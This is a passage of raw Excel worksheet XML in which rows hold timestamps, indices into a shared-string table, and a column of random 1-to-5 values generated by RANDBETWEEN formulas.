      <c r="E14792" t="s">
        <v>13041</v>
      </c>
      <c r="F14792">
        <f t="shared" ca="1" si="231"/>
        <v>3</v>
      </c>
    </row>
    <row r="14793" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A14793" s="1">
        <v>43234.910219907404</v>
      </c>
      <c r="C14793" t="s">
        <v>2210</v>
      </c>
      <c r="D14793" t="s">
        <v>721</v>
      </c>
      <c r="E14793" s="2" t="s">
        <v>13309</v>
      </c>
      <c r="F14793">
        <f t="shared" ca="1" si="231"/>
        <v>1</v>
      </c>
    </row>
    <row r="14794" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14794" s="1">
        <v>43234.900520833333</v>
      </c>
      <c r="C14794" t="s">
        <v>720</v>
      </c>
      <c r="D14794" t="s">
        <v>36</v>
      </c>
      <c r="E14794" t="s">
        <v>13310</v>
      </c>
      <c r="F14794">
        <f t="shared" ca="1" si="231"/>
        <v>4</v>
      </c>
    </row>
    <row r="14795" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14795" s="1">
        <v>43234.887696759259</v>
      </c>
      <c r="C14795" t="s">
        <v>6</v>
      </c>
      <c r="D14795" t="s">
        <v>821</v>
      </c>
      <c r="E14795" s="2" t="s">
        <v>13311</v>
      </c>
      <c r="F14795">
        <f t="shared" ca="1" si="231"/>
        <v>4</v>
      </c>
    </row>
    <row r="14796" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14796" s="1">
        <v>43234.872557870367</v>
      </c>
      <c r="C14796" t="s">
        <v>8364</v>
      </c>
      <c r="D14796" t="s">
        <v>36</v>
      </c>
      <c r="E14796" t="s">
        <v>13312</v>
      </c>
      <c r="F14796">
        <f t="shared" ca="1" si="231"/>
        <v>1</v>
      </c>
    </row>
    <row r="14797" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14797" s="1">
        <v>43234.864039351851</v>
      </c>
      <c r="C14797" t="s">
        <v>140</v>
      </c>
      <c r="D14797" t="s">
        <v>141</v>
      </c>
      <c r="E14797" t="s">
        <v>13313</v>
      </c>
      <c r="F14797">
        <f t="shared" ca="1" si="231"/>
        <v>5</v>
      </c>
    </row>
    <row r="14798" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14798" s="1">
        <v>43234.862800925926</v>
      </c>
      <c r="C14798" t="s">
        <v>8440</v>
      </c>
      <c r="D14798" t="s">
        <v>36</v>
      </c>
      <c r="E14798" t="s">
        <v>13314</v>
      </c>
      <c r="F14798">
        <f t="shared" ca="1" si="231"/>
        <v>5</v>
      </c>
    </row>
    <row r="14799" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14799" s="1">
        <v>43234.790196759262</v>
      </c>
      <c r="C14799" t="s">
        <v>97</v>
      </c>
      <c r="D14799" t="s">
        <v>713</v>
      </c>
      <c r="E14799" s="2" t="s">
        <v>13315</v>
      </c>
      <c r="F14799">
        <f t="shared" ca="1" si="231"/>
        <v>5</v>
      </c>
    </row>
    <row r="14800" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14800" s="1">
        <v>43234.769120370373</v>
      </c>
      <c r="C14800" t="s">
        <v>97</v>
      </c>
      <c r="D14800" t="s">
        <v>23</v>
      </c>
      <c r="E14800" s="2" t="s">
        <v>13316</v>
      </c>
      <c r="F14800">
        <f t="shared" ca="1" si="231"/>
        <v>4</v>
      </c>
    </row>
    <row r="14801" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14801" s="1">
        <v>43234.752951388888</v>
      </c>
      <c r="C14801" t="s">
        <v>479</v>
      </c>
      <c r="D14801" t="s">
        <v>36</v>
      </c>
      <c r="E14801" t="s">
        <v>13317</v>
      </c>
      <c r="F14801">
        <f t="shared" ca="1" si="231"/>
        <v>2</v>
      </c>
    </row>
    <row r="14802" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14802" s="1">
        <v>43234.747152777774</v>
      </c>
      <c r="C14802" t="s">
        <v>6</v>
      </c>
      <c r="D14802" t="s">
        <v>25</v>
      </c>
      <c r="E14802" t="s">
        <v>13318</v>
      </c>
      <c r="F14802">
        <f t="shared" ca="1" si="231"/>
        <v>2</v>
      </c>
    </row>
    <row r="14803" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14803" s="1">
        <v>43234.738599537035</v>
      </c>
      <c r="C14803" t="s">
        <v>63</v>
      </c>
      <c r="E14803" t="s">
        <v>13319</v>
      </c>
      <c r="F14803">
        <f t="shared" ca="1" si="231"/>
        <v>3</v>
      </c>
    </row>
    <row r="14804" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14804" s="1">
        <v>43234.724340277775</v>
      </c>
      <c r="C14804" t="s">
        <v>10</v>
      </c>
      <c r="D14804" t="s">
        <v>17</v>
      </c>
      <c r="E14804" s="2" t="s">
        <v>13320</v>
      </c>
      <c r="F14804">
        <f t="shared" ca="1" si="231"/>
        <v>4</v>
      </c>
    </row>
    <row r="14805" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14805" s="1">
        <v>43234.711238425924</v>
      </c>
      <c r="C14805" t="s">
        <v>10</v>
      </c>
      <c r="D14805" t="s">
        <v>36</v>
      </c>
      <c r="E14805" t="s">
        <v>13321</v>
      </c>
      <c r="F14805">
        <f t="shared" ca="1" si="231"/>
        <v>1</v>
      </c>
    </row>
    <row r="14806" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14806" s="1">
        <v>43234.702800925923</v>
      </c>
      <c r="C14806" t="s">
        <v>10</v>
      </c>
      <c r="D14806" t="s">
        <v>6</v>
      </c>
      <c r="E14806" t="s">
        <v>13322</v>
      </c>
      <c r="F14806">
        <f t="shared" ca="1" si="231"/>
        <v>1</v>
      </c>
    </row>
    <row r="14807" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14807" s="1">
        <v>43234.675219907411</v>
      </c>
      <c r="C14807" t="s">
        <v>10</v>
      </c>
      <c r="D14807" t="s">
        <v>192</v>
      </c>
      <c r="E14807" t="s">
        <v>13323</v>
      </c>
      <c r="F14807">
        <f t="shared" ca="1" si="231"/>
        <v>2</v>
      </c>
    </row>
    <row r="14808" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14808" s="1">
        <v>43234.671747685185</v>
      </c>
      <c r="C14808" t="s">
        <v>65</v>
      </c>
      <c r="D14808" t="s">
        <v>2214</v>
      </c>
      <c r="E14808" t="s">
        <v>13324</v>
      </c>
      <c r="F14808">
        <f t="shared" ca="1" si="231"/>
        <v>5</v>
      </c>
    </row>
    <row r="14809" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14809" s="1">
        <v>43234.664872685185</v>
      </c>
      <c r="C14809" t="s">
        <v>1199</v>
      </c>
      <c r="D14809" t="s">
        <v>36</v>
      </c>
      <c r="E14809" t="s">
        <v>13325</v>
      </c>
      <c r="F14809">
        <f t="shared" ca="1" si="231"/>
        <v>5</v>
      </c>
    </row>
    <row r="14810" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14810" s="1">
        <v>43234.659618055557</v>
      </c>
      <c r="C14810" t="s">
        <v>10</v>
      </c>
      <c r="D14810" t="s">
        <v>330</v>
      </c>
      <c r="E14810" t="s">
        <v>13326</v>
      </c>
      <c r="F14810">
        <f t="shared" ca="1" si="231"/>
        <v>2</v>
      </c>
    </row>
    <row r="14811" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14811" s="1">
        <v>43234.639166666668</v>
      </c>
      <c r="C14811" t="s">
        <v>1992</v>
      </c>
      <c r="D14811" t="s">
        <v>36</v>
      </c>
      <c r="E14811" t="s">
        <v>13327</v>
      </c>
      <c r="F14811">
        <f t="shared" ca="1" si="231"/>
        <v>1</v>
      </c>
    </row>
    <row r="14812" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14812" s="1">
        <v>43234.629953703705</v>
      </c>
      <c r="C14812" t="s">
        <v>158</v>
      </c>
      <c r="D14812" t="s">
        <v>36</v>
      </c>
      <c r="E14812" t="s">
        <v>13328</v>
      </c>
      <c r="F14812">
        <f t="shared" ca="1" si="231"/>
        <v>1</v>
      </c>
    </row>
    <row r="14813" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A14813" s="1">
        <v>43234.62636574074</v>
      </c>
      <c r="C14813" t="s">
        <v>10</v>
      </c>
      <c r="D14813" t="s">
        <v>163</v>
      </c>
      <c r="E14813" s="2" t="s">
        <v>13329</v>
      </c>
      <c r="F14813">
        <f t="shared" ca="1" si="231"/>
        <v>5</v>
      </c>
    </row>
    <row r="14814" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14814" s="1">
        <v>43234.622569444444</v>
      </c>
      <c r="C14814" t="s">
        <v>6</v>
      </c>
      <c r="D14814" t="s">
        <v>25</v>
      </c>
      <c r="E14814" t="s">
        <v>13330</v>
      </c>
      <c r="F14814">
        <f t="shared" ca="1" si="231"/>
        <v>1</v>
      </c>
    </row>
    <row r="14815" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14815" s="1">
        <v>43234.616527777776</v>
      </c>
      <c r="C14815" t="s">
        <v>6</v>
      </c>
      <c r="D14815" t="s">
        <v>821</v>
      </c>
      <c r="E14815" s="2" t="s">
        <v>13331</v>
      </c>
      <c r="F14815">
        <f t="shared" ca="1" si="231"/>
        <v>5</v>
      </c>
    </row>
    <row r="14816" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14816" s="1">
        <v>43234.602384259262</v>
      </c>
      <c r="C14816" t="s">
        <v>10</v>
      </c>
      <c r="D14816" t="s">
        <v>52</v>
      </c>
      <c r="E14816" t="s">
        <v>13332</v>
      </c>
      <c r="F14816">
        <f t="shared" ca="1" si="231"/>
        <v>3</v>
      </c>
    </row>
    <row r="14817" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14817" s="1">
        <v>43234.570428240739</v>
      </c>
      <c r="C14817" t="s">
        <v>10</v>
      </c>
      <c r="D14817" t="s">
        <v>80</v>
      </c>
      <c r="E14817" t="s">
        <v>13333</v>
      </c>
      <c r="F14817">
        <f t="shared" ca="1" si="231"/>
        <v>5</v>
      </c>
    </row>
    <row r="14818" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14818" s="1">
        <v>43234.556250000001</v>
      </c>
      <c r="C14818" t="s">
        <v>10</v>
      </c>
      <c r="D14818" t="s">
        <v>86</v>
      </c>
      <c r="E14818" t="s">
        <v>13334</v>
      </c>
      <c r="F14818">
        <f t="shared" ca="1" si="231"/>
        <v>5</v>
      </c>
    </row>
    <row r="14819" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14819" s="1">
        <v>43234.541458333333</v>
      </c>
      <c r="C14819" t="s">
        <v>10</v>
      </c>
      <c r="D14819" t="s">
        <v>163</v>
      </c>
      <c r="E14819" t="s">
        <v>13335</v>
      </c>
      <c r="F14819">
        <f t="shared" ca="1" si="231"/>
        <v>1</v>
      </c>
    </row>
    <row r="14820" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14820" s="1">
        <v>43234.522534722222</v>
      </c>
      <c r="C14820" t="s">
        <v>8666</v>
      </c>
      <c r="D14820" t="s">
        <v>36</v>
      </c>
      <c r="E14820" t="s">
        <v>13336</v>
      </c>
      <c r="F14820">
        <f t="shared" ca="1" si="231"/>
        <v>3</v>
      </c>
    </row>
    <row r="14821" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14821" s="1">
        <v>43234.508391203701</v>
      </c>
      <c r="C14821" t="s">
        <v>10</v>
      </c>
      <c r="E14821" t="s">
        <v>13337</v>
      </c>
      <c r="F14821">
        <f t="shared" ca="1" si="231"/>
        <v>5</v>
      </c>
    </row>
    <row r="14822" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14822" s="1">
        <v>43234.472997685189</v>
      </c>
      <c r="C14822" t="s">
        <v>10</v>
      </c>
      <c r="D14822" t="s">
        <v>39</v>
      </c>
      <c r="E14822" t="s">
        <v>13338</v>
      </c>
      <c r="F14822">
        <f t="shared" ca="1" si="231"/>
        <v>4</v>
      </c>
    </row>
    <row r="14823" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14823" s="1">
        <v>43234.444918981484</v>
      </c>
      <c r="C14823" t="s">
        <v>430</v>
      </c>
      <c r="D14823" t="s">
        <v>36</v>
      </c>
      <c r="E14823" t="s">
        <v>13339</v>
      </c>
      <c r="F14823">
        <f t="shared" ca="1" si="231"/>
        <v>4</v>
      </c>
    </row>
    <row r="14824" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14824" s="1">
        <v>43234.443530092591</v>
      </c>
      <c r="C14824" t="s">
        <v>6</v>
      </c>
      <c r="D14824" t="s">
        <v>114</v>
      </c>
      <c r="E14824" s="2" t="s">
        <v>13340</v>
      </c>
      <c r="F14824">
        <f t="shared" ca="1" si="231"/>
        <v>3</v>
      </c>
    </row>
    <row r="14825" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14825" s="1">
        <v>43234.41443287037</v>
      </c>
      <c r="C14825" t="s">
        <v>41</v>
      </c>
      <c r="E14825" t="s">
        <v>13341</v>
      </c>
      <c r="F14825">
        <f t="shared" ca="1" si="231"/>
        <v>1</v>
      </c>
    </row>
    <row r="14826" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14826" s="1">
        <v>43234.410694444443</v>
      </c>
      <c r="C14826" t="s">
        <v>10</v>
      </c>
      <c r="D14826" t="s">
        <v>192</v>
      </c>
      <c r="E14826" t="s">
        <v>13342</v>
      </c>
      <c r="F14826">
        <f t="shared" ca="1" si="231"/>
        <v>3</v>
      </c>
    </row>
    <row r="14827" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14827" s="1">
        <v>43234.402916666666</v>
      </c>
      <c r="C14827" t="s">
        <v>41</v>
      </c>
      <c r="E14827" t="s">
        <v>13343</v>
      </c>
      <c r="F14827">
        <f t="shared" ca="1" si="231"/>
        <v>5</v>
      </c>
    </row>
    <row r="14828" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14828" s="1">
        <v>43234.401979166665</v>
      </c>
      <c r="C14828" t="s">
        <v>10286</v>
      </c>
      <c r="D14828" t="s">
        <v>36</v>
      </c>
      <c r="E14828" t="s">
        <v>13344</v>
      </c>
      <c r="F14828">
        <f t="shared" ca="1" si="231"/>
        <v>4</v>
      </c>
    </row>
    <row r="14829" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14829" s="1">
        <v>43234.397581018522</v>
      </c>
      <c r="C14829" t="s">
        <v>71</v>
      </c>
      <c r="E14829" t="s">
        <v>13345</v>
      </c>
      <c r="F14829">
        <f t="shared" ca="1" si="231"/>
        <v>1</v>
      </c>
    </row>
    <row r="14830" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14830" s="1">
        <v>43234.392199074071</v>
      </c>
      <c r="C14830" t="s">
        <v>10</v>
      </c>
      <c r="D14830" t="s">
        <v>36</v>
      </c>
      <c r="E14830" s="2" t="s">
        <v>13346</v>
      </c>
      <c r="F14830">
        <f t="shared" ca="1" si="231"/>
        <v>2</v>
      </c>
    </row>
    <row r="14831" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14831" s="1">
        <v>43234.387002314812</v>
      </c>
      <c r="C14831" t="s">
        <v>845</v>
      </c>
      <c r="D14831" t="s">
        <v>36</v>
      </c>
      <c r="E14831" t="s">
        <v>13347</v>
      </c>
      <c r="F14831">
        <f t="shared" ca="1" si="231"/>
        <v>3</v>
      </c>
    </row>
    <row r="14832" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14832" s="1">
        <v>43234.369641203702</v>
      </c>
      <c r="C14832" t="s">
        <v>10</v>
      </c>
      <c r="D14832" t="s">
        <v>36</v>
      </c>
      <c r="E14832" t="s">
        <v>13348</v>
      </c>
      <c r="F14832">
        <f t="shared" ca="1" si="231"/>
        <v>2</v>
      </c>
    </row>
    <row r="14833" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14833" s="1">
        <v>43234.353414351855</v>
      </c>
      <c r="C14833" t="s">
        <v>48</v>
      </c>
      <c r="E14833" t="s">
        <v>13349</v>
      </c>
      <c r="F14833">
        <f t="shared" ca="1" si="231"/>
        <v>1</v>
      </c>
    </row>
    <row r="14834" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A14834" s="1">
        <v>43234.339826388888</v>
      </c>
      <c r="C14834" t="s">
        <v>103</v>
      </c>
      <c r="D14834" t="s">
        <v>1091</v>
      </c>
      <c r="E14834" s="2" t="s">
        <v>13350</v>
      </c>
      <c r="F14834">
        <f t="shared" ca="1" si="231"/>
        <v>2</v>
      </c>
    </row>
    <row r="14835" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14835" s="1">
        <v>43234.338622685187</v>
      </c>
      <c r="C14835" t="s">
        <v>173</v>
      </c>
      <c r="D14835" t="s">
        <v>107</v>
      </c>
      <c r="E14835" s="2" t="s">
        <v>13351</v>
      </c>
      <c r="F14835">
        <f t="shared" ca="1" si="231"/>
        <v>4</v>
      </c>
    </row>
    <row r="14836" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14836" s="1">
        <v>43234.338206018518</v>
      </c>
      <c r="C14836" t="s">
        <v>71</v>
      </c>
      <c r="E14836" t="s">
        <v>13352</v>
      </c>
      <c r="F14836">
        <f t="shared" ca="1" si="231"/>
        <v>2</v>
      </c>
    </row>
    <row r="14837" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14837" s="1">
        <v>43234.334641203706</v>
      </c>
      <c r="C14837" t="s">
        <v>48</v>
      </c>
      <c r="E14837" t="s">
        <v>13353</v>
      </c>
      <c r="F14837">
        <f t="shared" ca="1" si="231"/>
        <v>1</v>
      </c>
    </row>
    <row r="14838" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14838" s="1">
        <v>43234.316446759258</v>
      </c>
      <c r="C14838" t="s">
        <v>173</v>
      </c>
      <c r="D14838" t="s">
        <v>71</v>
      </c>
      <c r="E14838" s="2" t="s">
        <v>13354</v>
      </c>
      <c r="F14838">
        <f t="shared" ca="1" si="231"/>
        <v>3</v>
      </c>
    </row>
    <row r="14839" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14839" s="1">
        <v>43234.313159722224</v>
      </c>
      <c r="C14839" t="s">
        <v>454</v>
      </c>
      <c r="D14839" t="s">
        <v>312</v>
      </c>
      <c r="E14839" s="2" t="s">
        <v>13355</v>
      </c>
      <c r="F14839">
        <f t="shared" ca="1" si="231"/>
        <v>4</v>
      </c>
    </row>
    <row r="14840" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14840" s="1">
        <v>43234.310914351852</v>
      </c>
      <c r="C14840" t="s">
        <v>6</v>
      </c>
      <c r="D14840" t="s">
        <v>25</v>
      </c>
      <c r="E14840" t="s">
        <v>13356</v>
      </c>
      <c r="F14840">
        <f t="shared" ca="1" si="231"/>
        <v>5</v>
      </c>
    </row>
    <row r="14841" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14841" s="1">
        <v>43234.303425925929</v>
      </c>
      <c r="C14841" t="s">
        <v>2155</v>
      </c>
      <c r="D14841" t="s">
        <v>36</v>
      </c>
      <c r="E14841" t="s">
        <v>13357</v>
      </c>
      <c r="F14841">
        <f t="shared" ca="1" si="231"/>
        <v>5</v>
      </c>
    </row>
    <row r="14842" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14842" s="1">
        <v>43234.295844907407</v>
      </c>
      <c r="C14842" t="s">
        <v>173</v>
      </c>
      <c r="D14842" t="s">
        <v>89</v>
      </c>
      <c r="E14842" s="2" t="s">
        <v>13358</v>
      </c>
      <c r="F14842">
        <f t="shared" ca="1" si="231"/>
        <v>1</v>
      </c>
    </row>
    <row r="14843" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A14843" s="1">
        <v>43234.285451388889</v>
      </c>
      <c r="C14843" t="s">
        <v>535</v>
      </c>
      <c r="E14843" s="2" t="s">
        <v>13359</v>
      </c>
      <c r="F14843">
        <f t="shared" ca="1" si="231"/>
        <v>4</v>
      </c>
    </row>
    <row r="14844" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14844" s="1">
        <v>43234.283541666664</v>
      </c>
      <c r="C14844" t="s">
        <v>454</v>
      </c>
      <c r="E14844" s="2" t="s">
        <v>13360</v>
      </c>
      <c r="F14844">
        <f t="shared" ca="1" si="231"/>
        <v>5</v>
      </c>
    </row>
    <row r="14845" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A14845" s="1">
        <v>43234.26971064815</v>
      </c>
      <c r="C14845" t="s">
        <v>10</v>
      </c>
      <c r="D14845" t="s">
        <v>23</v>
      </c>
      <c r="E14845" s="2" t="s">
        <v>13361</v>
      </c>
      <c r="F14845">
        <f t="shared" ca="1" si="231"/>
        <v>3</v>
      </c>
    </row>
    <row r="14846" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14846" s="1">
        <v>43234.221296296295</v>
      </c>
      <c r="C14846" t="s">
        <v>559</v>
      </c>
      <c r="E14846" t="s">
        <v>13362</v>
      </c>
      <c r="F14846">
        <f t="shared" ca="1" si="231"/>
        <v>3</v>
      </c>
    </row>
    <row r="14847" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14847" s="1">
        <v>43234.21733796296</v>
      </c>
      <c r="C14847" t="s">
        <v>3994</v>
      </c>
      <c r="D14847" t="s">
        <v>36</v>
      </c>
      <c r="E14847" t="s">
        <v>13363</v>
      </c>
      <c r="F14847">
        <f t="shared" ca="1" si="231"/>
        <v>1</v>
      </c>
    </row>
    <row r="14848" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14848" s="1">
        <v>43234.217199074075</v>
      </c>
      <c r="C14848" t="s">
        <v>60</v>
      </c>
      <c r="E14848" s="2" t="s">
        <v>13364</v>
      </c>
      <c r="F14848">
        <f t="shared" ca="1" si="231"/>
        <v>3</v>
      </c>
    </row>
    <row r="14849" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A14849" s="1">
        <v>43234.203773148147</v>
      </c>
      <c r="C14849" t="s">
        <v>103</v>
      </c>
      <c r="D14849" t="s">
        <v>2214</v>
      </c>
      <c r="E14849" s="2" t="s">
        <v>13365</v>
      </c>
      <c r="F14849">
        <f t="shared" ca="1" si="231"/>
        <v>3</v>
      </c>
    </row>
    <row r="14850" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14850" s="1">
        <v>43234.19122685185</v>
      </c>
      <c r="C14850" t="s">
        <v>41</v>
      </c>
      <c r="E14850" t="s">
        <v>13366</v>
      </c>
      <c r="F14850">
        <f t="shared" ref="F14850:F14913" ca="1" si="232">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="14851" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14851" s="1">
        <v>43234.166354166664</v>
      </c>
      <c r="C14851" t="s">
        <v>563</v>
      </c>
      <c r="D14851" t="s">
        <v>36</v>
      </c>
      <c r="E14851" t="s">
        <v>13367</v>
      </c>
      <c r="F14851">
        <f t="shared" ca="1" si="232"/>
        <v>4</v>
      </c>
    </row>
    <row r="14852" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14852" s="1">
        <v>43234.150462962964</v>
      </c>
      <c r="C14852" t="s">
        <v>721</v>
      </c>
      <c r="D14852" t="s">
        <v>36</v>
      </c>
      <c r="E14852" t="s">
        <v>13368</v>
      </c>
      <c r="F14852">
        <f t="shared" ca="1" si="232"/>
        <v>5</v>
      </c>
    </row>
    <row r="14853" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14853" s="1">
        <v>43234.134432870371</v>
      </c>
      <c r="C14853" t="s">
        <v>430</v>
      </c>
      <c r="E14853" t="s">
        <v>13369</v>
      </c>
      <c r="F14853">
        <f t="shared" ca="1" si="232"/>
        <v>2</v>
      </c>
    </row>
    <row r="14854" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14854" s="1">
        <v>43234.121134259258</v>
      </c>
      <c r="C14854" t="s">
        <v>41</v>
      </c>
      <c r="E14854" t="s">
        <v>13370</v>
      </c>
      <c r="F14854">
        <f t="shared" ca="1" si="232"/>
        <v>3</v>
      </c>
    </row>
    <row r="14855" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14855" s="1">
        <v>43234.121122685188</v>
      </c>
      <c r="C14855" t="s">
        <v>229</v>
      </c>
      <c r="E14855" t="s">
        <v>13371</v>
      </c>
      <c r="F14855">
        <f t="shared" ca="1" si="232"/>
        <v>3</v>
      </c>
    </row>
    <row r="14856" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A14856" s="1">
        <v>43234.10491898148</v>
      </c>
      <c r="C14856" t="s">
        <v>41</v>
      </c>
      <c r="D14856" t="s">
        <v>1091</v>
      </c>
      <c r="E14856" s="2" t="s">
        <v>13372</v>
      </c>
      <c r="F14856">
        <f t="shared" ca="1" si="232"/>
        <v>3</v>
      </c>
    </row>
    <row r="14857" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14857" s="1">
        <v>43234.082708333335</v>
      </c>
      <c r="C14857" t="s">
        <v>9633</v>
      </c>
      <c r="D14857" t="s">
        <v>36</v>
      </c>
      <c r="E14857" t="s">
        <v>13373</v>
      </c>
      <c r="F14857">
        <f t="shared" ca="1" si="232"/>
        <v>3</v>
      </c>
    </row>
    <row r="14858" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14858" s="1">
        <v>43234.024756944447</v>
      </c>
      <c r="C14858" t="s">
        <v>41</v>
      </c>
      <c r="E14858" t="s">
        <v>13374</v>
      </c>
      <c r="F14858">
        <f t="shared" ca="1" si="232"/>
        <v>3</v>
      </c>
    </row>
    <row r="14859" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A14859" s="1">
        <v>43234.022453703707</v>
      </c>
      <c r="C14859" t="s">
        <v>7491</v>
      </c>
      <c r="D14859" t="s">
        <v>271</v>
      </c>
      <c r="E14859" s="2" t="s">
        <v>13375</v>
      </c>
      <c r="F14859">
        <f t="shared" ca="1" si="232"/>
        <v>3</v>
      </c>
    </row>
    <row r="14860" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14860" s="1">
        <v>43234.003900462965</v>
      </c>
      <c r="C14860" t="s">
        <v>477</v>
      </c>
      <c r="D14860" t="s">
        <v>36</v>
      </c>
      <c r="E14860" t="s">
        <v>13376</v>
      </c>
      <c r="F14860">
        <f t="shared" ca="1" si="232"/>
        <v>3</v>
      </c>
    </row>
    <row r="14861" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14861" s="1">
        <v>43234.001793981479</v>
      </c>
      <c r="C14861" t="s">
        <v>140</v>
      </c>
      <c r="D14861" t="s">
        <v>141</v>
      </c>
      <c r="E14861" t="s">
        <v>13377</v>
      </c>
      <c r="F14861">
        <f t="shared" ca="1" si="232"/>
        <v>3</v>
      </c>
    </row>
    <row r="14862" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14862" s="1">
        <v>43233.999756944446</v>
      </c>
      <c r="C14862" t="s">
        <v>140</v>
      </c>
      <c r="D14862" t="s">
        <v>234</v>
      </c>
      <c r="E14862" s="2" t="s">
        <v>13378</v>
      </c>
      <c r="F14862">
        <f t="shared" ca="1" si="232"/>
        <v>5</v>
      </c>
    </row>
    <row r="14863" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14863" s="1">
        <v>43233.977511574078</v>
      </c>
      <c r="C14863" t="s">
        <v>73</v>
      </c>
      <c r="E14863" s="2" t="s">
        <v>13379</v>
      </c>
      <c r="F14863">
        <f t="shared" ca="1" si="232"/>
        <v>2</v>
      </c>
    </row>
    <row r="14864" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14864" s="1">
        <v>43233.938414351855</v>
      </c>
      <c r="C14864" t="s">
        <v>355</v>
      </c>
      <c r="D14864" t="s">
        <v>36</v>
      </c>
      <c r="E14864" t="s">
        <v>13380</v>
      </c>
      <c r="F14864">
        <f t="shared" ca="1" si="232"/>
        <v>5</v>
      </c>
    </row>
    <row r="14865" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14865" s="1">
        <v>43233.937037037038</v>
      </c>
      <c r="C14865" t="s">
        <v>1408</v>
      </c>
      <c r="D14865" t="s">
        <v>56</v>
      </c>
      <c r="E14865" s="2" t="s">
        <v>13381</v>
      </c>
      <c r="F14865">
        <f t="shared" ca="1" si="232"/>
        <v>1</v>
      </c>
    </row>
    <row r="14866" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14866" s="1">
        <v>43233.930891203701</v>
      </c>
      <c r="C14866" t="s">
        <v>2192</v>
      </c>
      <c r="D14866" t="s">
        <v>36</v>
      </c>
      <c r="E14866" t="s">
        <v>13382</v>
      </c>
      <c r="F14866">
        <f t="shared" ca="1" si="232"/>
        <v>3</v>
      </c>
    </row>
    <row r="14867" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14867" s="1">
        <v>43233.873761574076</v>
      </c>
      <c r="C14867" t="s">
        <v>243</v>
      </c>
      <c r="D14867" t="s">
        <v>36</v>
      </c>
      <c r="E14867" t="s">
        <v>13383</v>
      </c>
      <c r="F14867">
        <f t="shared" ca="1" si="232"/>
        <v>4</v>
      </c>
    </row>
    <row r="14868" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14868" s="1">
        <v>43233.791875000003</v>
      </c>
      <c r="C14868" t="s">
        <v>197</v>
      </c>
      <c r="D14868" t="s">
        <v>36</v>
      </c>
      <c r="E14868" t="s">
        <v>13384</v>
      </c>
      <c r="F14868">
        <f t="shared" ca="1" si="232"/>
        <v>4</v>
      </c>
    </row>
    <row r="14869" spans="1:6" x14ac:dyDescent="0.25">
